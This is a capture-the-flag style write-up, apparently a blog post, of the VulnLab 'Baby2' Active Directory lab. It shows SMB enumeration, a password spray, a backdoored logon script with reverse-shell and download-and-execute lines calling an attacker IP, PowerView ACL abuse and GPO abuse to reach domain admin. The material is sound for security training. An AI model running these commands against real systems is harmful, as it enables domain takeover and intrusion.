VulnLab Baby2
VulnLab Baby2
VulnLab Baby2
Baby2
Recon
1
2
└─$ rustscan -g -a 10.10.98.104 -r 1-65535
10.10.98.104 -> [53,88,139,135,389,445,464,593,636,3389,3269,3268,5985,9389]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
└─$ nmap -sC -sV -p53,88,139,135,389,445,464,593,636,3389,3269,3268,5985,9389 10.10.98.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 20:37 +05
Nmap scan report for 10.10.98.104
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-20 15:36:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Not valid before: 2024-12-20T15:18:59
|_Not valid after: 2025-12-20T15:18:59
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Not valid before: 2024-12-20T15:18:59
|_Not valid after: 2025-12-20T15:18:59
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Not valid before: 2024-12-20T15:18:59
|_Not valid after: 2025-12-20T15:18:59
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Not valid before: 2024-12-20T15:18:59
|_Not valid after: 2025-12-20T15:18:59
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-12-20T15:37:37+00:00; -1m19s from scanner time.
| rdp-ntlm-info:
| Target_Name: BABY2
| NetBIOS_Domain_Name: BABY2
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: baby2.vl
| DNS_Computer_Name: dc.baby2.vl
| DNS_Tree_Name: baby2.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-12-20T15:36:58+00:00
| ssl-cert: Subject: commonName=dc.baby2.vl
| Not valid before: 2024-12-19T15:27:59
|_Not valid after: 2025-06-20T15:27:59
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -1m18s, deviation: 0s, median: -1m18s
| smb2-time:
| date: 2024-12-20T15:37:02
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.50 seconds
User
No results in LDAP using anonymous authentication, but have results in SMB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ nxc smb 10.10.98.104 -u 'guest' -p '' --shares
SMB 10.10.98.104 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB 10.10.98.104 445 DC [+] baby2.vl\guest:
SMB 10.10.98.104 445 DC [*] Enumerated shares
SMB 10.10.98.104 445 DC Share Permissions Remark
SMB 10.10.98.104 445 DC ----- ----------- ------
SMB 10.10.98.104 445 DC ADMIN$ Remote Admin
SMB 10.10.98.104 445 DC apps READ
SMB 10.10.98.104 445 DC C$ Default share
SMB 10.10.98.104 445 DC docs
SMB 10.10.98.104 445 DC homes READ,WRITE
SMB 10.10.98.104 445 DC IPC$ READ Remote IPC
SMB 10.10.98.104 445 DC NETLOGON READ Logon server share
SMB 10.10.98.104 445 DC SYSVOL Logon server share
Let’s check content of homes share
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
└─$ smbmap -u guest -p '' -H 10.10.98.104 -r 'homes'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.98.104:445 Name: 10.10.98.104 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
apps READ ONLY
C$ NO ACCESS Default share
docs NO ACCESS
homes READ, WRITE
./homes
dr--r--r-- 0 Fri Dec 20 20:53:48 2024 .
dr--r--r-- 0 Wed Aug 23 02:10:21 2023 ..
dr--r--r-- 0 Wed Aug 23 02:18:40 2023 Amelia.Griffiths
dr--r--r-- 0 Wed Aug 23 02:18:40 2023 Carl.Moore
dr--r--r-- 0 Wed Aug 23 02:18:40 2023 Harry.Shaw
dr--r--r-- 0 Wed Aug 23 02:18:40 2023 Joan.Jennings
dr--r--r-- 0 Wed Aug 23 02:18:40 2023 Joel.Hurst
dr--r--r-- 0 Wed Aug 23 02:18:40 2023 Kieran.Mitchell
dr--r--r-- 0 Sat Sep 2 20:45:25 2023 library
dr--r--r-- 0 Wed Aug 23 02:18:40 2023 Lynda.Bailey
dr--r--r-- 0 Wed Aug 23 02:18:40 2023 Mohammed.Harris
dr--r--r-- 0 Wed Aug 23 02:18:40 2023 Nicola.Lamb
dr--r--r-- 0 Wed Aug 23 02:18:40 2023 Ryan.Jenkins
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL NO ACCESS Logon server share
[*] Closed 1 connections
Now let’s check apps share
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
└─$ smbmap -u guest -p '' -H 10.10.98.104 -r 'apps'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.98.104:445 Name: 10.10.98.104 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
apps READ ONLY
./apps
dr--r--r-- 0 Fri Sep 8 01:20:13 2023 .
dr--r--r-- 0 Wed Aug 23 02:10:21 2023 ..
dr--r--r-- 0 Fri Sep 8 01:20:13 2023 dev
C$ NO ACCESS Default share
docs NO ACCESS
homes READ, WRITE
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL NO ACCESS Logon server share
[*] Closed 1 connections
In apps we find logon script, which points to C:\Windows\SYSVOL\sysvol\baby2.vl\scripts\, \\DC\NETLOGON\login.vbs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
└─$ smbclient.py guest:''@10.10.98.104
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# use apps
# ls
drw-rw-rw- 0 Fri Sep 8 01:20:13 2023 .
drw-rw-rw- 0 Wed Aug 23 02:10:21 2023 ..
drw-rw-rw- 0 Fri Sep 8 01:20:13 2023 dev
# cd dev
# ls
drw-rw-rw- 0 Fri Sep 8 01:20:13 2023 .
drw-rw-rw- 0 Fri Sep 8 01:20:13 2023 ..
-rw-rw-rw- 108 Fri Sep 8 01:20:13 2023 CHANGELOG
-rw-rw-rw- 1800 Fri Sep 8 01:20:13 2023 login.vbs.lnk
# cat CHANGELOG
[0.2]
- Added automated drive mapping
[0.1]
- Rolled out initial version of the domain logon script
We have user list from homes share, let’s play password guessing game. We start with simple guess, where password is same as username. In case of fail we will try creating password list using CUPP
1
2
3
4
5
6
7
8
9
10
11
└─$ nxc smb 10.10.98.104 -u users.list -p users.list --continue-on-success --no-bruteforce
SMB 10.10.98.104 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB 10.10.98.104 445 DC [-] baby2.vl\Amelia.Griffiths:Amelia.Griffiths STATUS_LOGON_FAILURE
SMB 10.10.98.104 445 DC [+] baby2.vl\Carl.Moore:Carl.Moore
SMB 10.10.98.104 445 DC [-] baby2.vl\Harry.Shaw:Harry.Shaw STATUS_LOGON_FAILURE
SMB 10.10.98.104 445 DC [-] baby2.vl\Joan.Jennings:Joan.Jennings STATUS_LOGON_FAILURE
SMB 10.10.98.104 445 DC [-] baby2.vl\Joel.Hurst:Joel.Hurst STATUS_LOGON_FAILURE
SMB 10.10.98.104 445 DC [-] baby2.vl\Kieran.Mitchell:Kieran.Mitchell STATUS_LOGON_FAILURE
SMB 10.10.98.104 445 DC [-] baby2.vl\Mohammed.Harris:Mohammed.Harris STATUS_LOGON_FAILURE
SMB 10.10.98.104 445 DC [-] baby2.vl\Nicola.Lamb:Nicola.Lamb STATUS_LOGON_FAILURE
SMB 10.10.98.104 445 DC [-] baby2.vl\Ryan.Jenkins:Ryan.Jenkins STATUS_LOGON_FAILURE
We have a hit, let’s gather domain information and run nxc again
1
2
3
└─$ bloodhound-python -d 'baby2.vl' -u 'Carl.Moore' -p 'Carl.Moore' -c all -ns 10.10.98.104 --zip
INFO: Found AD domain: baby2
<SNIP>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ nxc smb 10.10.98.104 -u 'Carl.Moore' -p 'Carl.Moore' --shares
SMB 10.10.98.104 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB 10.10.98.104 445 DC [+] baby2.vl\Carl.Moore:Carl.Moore
SMB 10.10.98.104 445 DC [*] Enumerated shares
SMB 10.10.98.104 445 DC Share Permissions Remark
SMB 10.10.98.104 445 DC ----- ----------- ------
SMB 10.10.98.104 445 DC ADMIN$ Remote Admin
SMB 10.10.98.104 445 DC apps READ,WRITE
SMB 10.10.98.104 445 DC C$ Default share
SMB 10.10.98.104 445 DC docs READ,WRITE
SMB 10.10.98.104 445 DC homes READ,WRITE
SMB 10.10.98.104 445 DC IPC$ READ Remote IPC
SMB 10.10.98.104 445 DC NETLOGON READ Logon server share
SMB 10.10.98.104 445 DC SYSVOL READ Logon server share
Let’s check the contents
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
└─$ nxc smb 10.10.98.104 -u 'Carl.Moore' -p 'Carl.Moore' -M spider_plus
SMB 10.10.98.104 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB 10.10.98.104 445 DC [+] baby2.vl\Carl.Moore:Carl.Moore
SPIDER_PLUS 10.10.98.104 445 DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.98.104 445 DC [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.98.104 445 DC [*] STATS_FLAG: True
SPIDER_PLUS 10.10.98.104 445 DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.98.104 445 DC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.98.104 445 DC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.98.104 445 DC [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.98.104 445 DC [*] Enumerated shares
SMB 10.10.98.104 445 DC Share Permissions Remark
SMB 10.10.98.104 445 DC ----- ----------- ------
SMB 10.10.98.104 445 DC ADMIN$ Remote Admin
SMB 10.10.98.104 445 DC apps READ,WRITE
SMB 10.10.98.104 445 DC C$ Default share
SMB 10.10.98.104 445 DC docs READ,WRITE
SMB 10.10.98.104 445 DC homes READ,WRITE
SMB 10.10.98.104 445 DC IPC$ READ Remote IPC
SMB 10.10.98.104 445 DC NETLOGON READ Logon server share
SMB 10.10.98.104 445 DC SYSVOL READ Logon server share
SPIDER_PLUS 10.10.98.104 445 DC [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.98.104.json".
SPIDER_PLUS 10.10.98.104 445 DC [*] SMB Shares: 8 (ADMIN$, apps, C$, docs, homes, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.98.104 445 DC [*] SMB Readable Shares: 6 (apps, docs, homes, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.98.104 445 DC [*] SMB Writable Shares: 3 (apps, docs, homes)
SPIDER_PLUS 10.10.98.104 445 DC [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.98.104 445 DC [*] Total folders found: 34
SPIDER_PLUS 10.10.98.104 445 DC [*] Total files found: 9
SPIDER_PLUS 10.10.98.104 445 DC [*] File size average: 1.26 KB
SPIDER_PLUS 10.10.98.104 445 DC [*] File size min: 22 B
SPIDER_PLUS 10.10.98.104 445 DC [*] File size max: 3.71 KB
1
2
3
4
5
6
└─$ smbmap -u Carl.Moore -p 'Carl.Moore' -H 10.10.98.104 -r 'SYSVOL' --depth 5
<SNIP>
./SYSVOL//baby2.vl/scripts
dr--r--r-- 0 Wed Aug 23 01:28:27 2023 .
dr--r--r-- 0 Tue Aug 22 23:43:55 2023 ..
fr--r--r-- 992 Sat Sep 2 20:55:51 2023 login.vbs
Now we can access the logon scipt mentioned before. Nothing interesting, but notice that we have write privileges over the script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
└─$ smbclient.py Carl.Moore:'Carl.Moore'@10.10.98.104
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use SYSVOL
# ls
drw-rw-rw- 0 Tue Aug 22 23:37:46 2023 .
drw-rw-rw- 0 Tue Aug 22 23:37:46 2023 ..
drw-rw-rw- 0 Tue Aug 22 23:37:46 2023 baby2.vl
# cd baby2.vl
# ls
drw-rw-rw- 0 Tue Aug 22 23:43:55 2023 .
drw-rw-rw- 0 Tue Aug 22 23:37:46 2023 ..
drw-rw-rw- 0 Fri Dec 20 20:28:37 2024 DfsrPrivate
drw-rw-rw- 0 Tue Aug 22 23:37:46 2023 Policies
drw-rw-rw- 0 Wed Aug 23 01:28:27 2023 scripts
# cd scripts
# ls
drw-rw-rw- 0 Wed Aug 23 01:28:27 2023 .
drw-rw-rw- 0 Tue Aug 22 23:43:55 2023 ..
-rw-rw-rw- 992 Sat Sep 2 20:55:51 2023 login.vbs
# cat login.vbs
Sub MapNetworkShare(sharePath, driveLetter)
Dim objNetwork
Set objNetwork = CreateObject("WScript.Network")
' Check if the drive is already mapped
Dim mappedDrives
Set mappedDrives = objNetwork.EnumNetworkDrives
Dim isMapped
isMapped = False
For i = 0 To mappedDrives.Count - 1 Step 2
If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then
isMapped = True
Exit For
End If
Next
If isMapped Then
objNetwork.RemoveNetworkDrive driveLetter & ":", True, True
End If
objNetwork.MapNetworkDrive driveLetter & ":", sharePath
If Err.Number = 0 Then
WScript.Echo "Mapped " & driveLetter & ": to " & sharePath
Else
WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
End If
Set objNetwork = Nothing
End Sub
MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"
#
Let’s modify it. Let’s add few lines to acquire reverse shell
1
2
3
Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c certutil -urlcache -f http://10.8.4.147/nc64.exe C:\ProgramData\nc.exe"
oShell.run "cmd.exe /c C:\ProgramData\nc.exe 10.8.4.147 443 -e cmd.exe"
Or
1
2
Set oShell = CreateObject("Wscript.Shell")
oShell.run("powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.4.147/shell.txt');")
We get a connection
1
2
3
4
5
6
7
8
9
10
└─$ rlwrap nc -lvnp 9000
listening on [any] 9000 ...
connect to [10.8.4.147] from (UNKNOWN) [10.10.98.104] 58932
Microsoft Windows [Version 10.0.20348.1906]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
baby2\amelia.griffiths
C:\Windows\system32>
Root
If we check bloodhound, we see that amelia.griffiths is a member of legacy group which has WriteDacl rights over GPOADM user, who has GenericAll rights over default GPOs
We can grant full rights over GPOADM and change the password. We have to use Powerview
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
PS C:\ProgramData> Add-DomainObjectAcl -TargetIdentity "GPOADM" -PrincipalIdentity legacy -Domain baby2.vl -Rights All -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://baby2.vl/DC=BABY2,DC=VL
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(&(|(|(samAccountName=legacy)(name=legacy)(displayname=legacy))))
VERBOSE: [Get-DomainSearcher] search base: LDAP://baby2.vl/DC=BABY2,DC=VL
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(&(|(|(samAccountName=GPOADM)(name=GPOADM)(displayname=GPOADM))))
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=legacy,CN=Users,DC=baby2,DC=vl 'All' on
CN=gpoadm,OU=gpo-management,DC=baby2,DC=vl
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=legacy,CN=Users,DC=baby2,DC=vl rights GUID
'00000000-0000-0000-0000-000000000000' on
CN=gpoadm,OU=gpo-management,DC=baby2,DC=vl
PS C:\ProgramData>
PS C:\ProgramData> $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
PS C:\ProgramData> Set-DomainUserPassword -Identity GPOADM -AccountPassword $UserPassword
PS C:\ProgramData>
1
2
3
└─$ nxc smb 10.10.98.104 -u 'GPOADM' -p 'Password123!'
SMB 10.10.98.104 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB 10.10.98.104 445 DC [+] baby2.vl\GPOADM:Password123!
Since we have full rights over GPO which is linked to Domain Controller, we can use pygpoabuse.py to abuse it
Let’s simply add GPOADM to Administrators group
1
2
3
└─$ python3 pygpoabuse.py 'baby2.vl/gpoadm:Password123!' -gpo-id 6AC1786C-016F-11D2-945F-00C04FB984F9 -f -dc-ip 10.10.98.104 -command 'net localgroup administrators /add gpoadm'
SUCCESS:root:ScheduledTask TASK_efabf2fd created!
[+] ScheduledTask TASK_efabf2fd created!
We can run gpupdate /force to make it faster
1
2
3
└─$ nxc smb 10.10.98.104 -u 'GPOADM' -p 'Password123!'
SMB 10.10.98.104 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB 10.10.98.104 445 DC [+] baby2.vl\GPOADM:Password123! (Pwn3d!)
Now we can retrieve the flag
1
2
3
4
5
6
7
8
9
10
└─$ evil-winrm -u GPOADM -p Password123! -i 10.10.98.104
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\gpoadm\Documents>
https://api.vulnlab.com/api/v1/share?id=33945106-eafe-415d-aeb5-50202a1815e9
This post is licensed under CC BY 4.0 by the author.